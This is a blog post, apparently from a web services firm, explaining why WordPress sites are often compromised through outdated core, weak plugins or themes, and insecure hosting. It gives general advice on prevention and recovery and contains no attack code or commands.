WordPress site compromised? You’re not alone.
Ah, WordPress. An excellent platform, but one plagued by security concerns. Earlier this week we were discussing WordPress with a client; its strengths and weaknesses, and what exactly the deal is with security. So although plenty has already been written about the subject, it definitely bears a quick re-cap on what the problem is, and what you can do to avoid it.
The background
We all know that WordPress makes it possible for virtually anyone to put together a credible website. But WordPress’s widespread adoption also puts deployment and administration of these sites into the hands of a large number of people who don’t have the knowledge and skills required to manage the security aspects.
There are currently over a billion sites on the web. And as of September 2016 the W3Techs technology survey puts the percentage of those powered by WordPress at 26.7%, and growing. That’s a staggering number of WordPress sites. Of those, it’s reckoned that around 70% are vulnerable in some way – contributing to the statistic of 37,000 websites which are hacked every day. There’s even a web database of WordPress core, plugin and theme vulnerabilities - which lists 5240 known vulnerabilities at the time of writing.
So what do you need to know?
Who suffers from WordPress hacks, and why?
Anyone running a WordPress site could potentially find themselves a target for hackers. Most attacks are automated, with bots out crawling the web looking for known vulnerabilities. Any sites demonstrating those vulnerabilities will likely be targeted at some point, just because the opportunity is there. So being relatively small, or relatively obscure, is no guarantee that your site won’t be compromised.
As for the ‘why’. Well, often it’s just because it’s possible. Human beings often do things just to prove we can – whether it’s climbing mountains or hacking websites. However, hackers may also gain access in order to misuse system resources; by sending spam from compromised websites, or putting in malicious redirects, phishing pages, or distributing malware. Actual attempts to steal user data are fairly low on the list of what attackers do, so again, the fact that you don’t store user or credit card data on your site doesn’t mean you won’t be targeted.
What’s a vulnerability?
Because it is exposed on the web, most website code - even when it’s well written - can be broken into eventually, especially by someone determined enough. And the more well-known and available the code is, the more hackers there are who will have a crack at it; and by sheer force of numbers, will find some area of weakness they can exploit. The areas of weakness they find are what we call ‘vulnerabilities’.
WordPress, at its core, is a pretty solid piece of software. It’s well-maintained, frequently updated, and built with security in mind. However, updates don’t happen automatically – which is where the first problem creeps in. If users or administrators don’t keep their sites up to date with the latest WP release, then the fixes for known issues won’t be applied, and their sites will contain vulnerabilities which would have been patched if they’d installed the latest version.
Secondly, WordPress is also at the centre of a large community of open-source development - and so we arrive at the next problem. There are currently an estimated 44,000 plugins available for WordPress, written by anyone from experienced developers to teenagers in their bedrooms. There are also thousands of themes – again written by a variety of individuals with a variety of skill levels. In many of the instances where a WP site is compromised, it is not WordPress itself that’s at fault but a plugin or theme. But for the average WordPress user or administrator, telling the difference between a well-built, secure plugin or theme and one with inherent issues just isn’t part of their skill-set.
The third area of vulnerability is actually statistically the largest – and that’s the hosting setup. In 2013 it was reckoned that in 41% of WordPress sites that were hacked, the point of entry was insecure hosting. But because the average WordPress admin – by their own admission – knows very little about hosting, many of them opt for cheap shared hosting which is not geared to security, has no particular monitoring, and often has no backups.
What can I do to prevent these problems?
The areas of weakness above tell us most of what we need to know about how to defend WordPress against intrusion. Keep WordPress updated to the latest version, only use trusted plugins and themes, and choose your hosting carefully. WordPress itself has comprehensive information in its Codex on defending your installation against intrusion.
However, much of the advice on the Codex, like most of the listings in the vulnerability database, will fox anyone but a pretty advanced user. And, let’s face it, the technical aspects of updating the core, maintaining backups and monitoring for intrusion attempts is enough to make most folks feel overwhelmed. Life’s too short to wrestle with this stuff, and the risks are too high.
Which is why – while WordPress is an excellent tool for managing content - we recommend putting the security of your WordPress site into the hands of a professional.
And finally…
One aspect that’s not frequently covered in the information about WordPress security is what to do in the wake of a compromise. If it’s happened to you, you’ll be aware that can be a recurring problem. Your site been noticed by the bots, which will often cause a return visit, so there are two key things that need to happen if your site has been compromised. The first is a thorough clean-up of the code - ideally via complete deletion and restore from a clean backup. Once breached, it’s incredibly difficult to be sure that all malicious code has been removed from an installation. And the second is to find and remedy the vulnerability which allowed access in the first place. Put the site live again with the vulnerability still in place and you’ll just end up back where you started.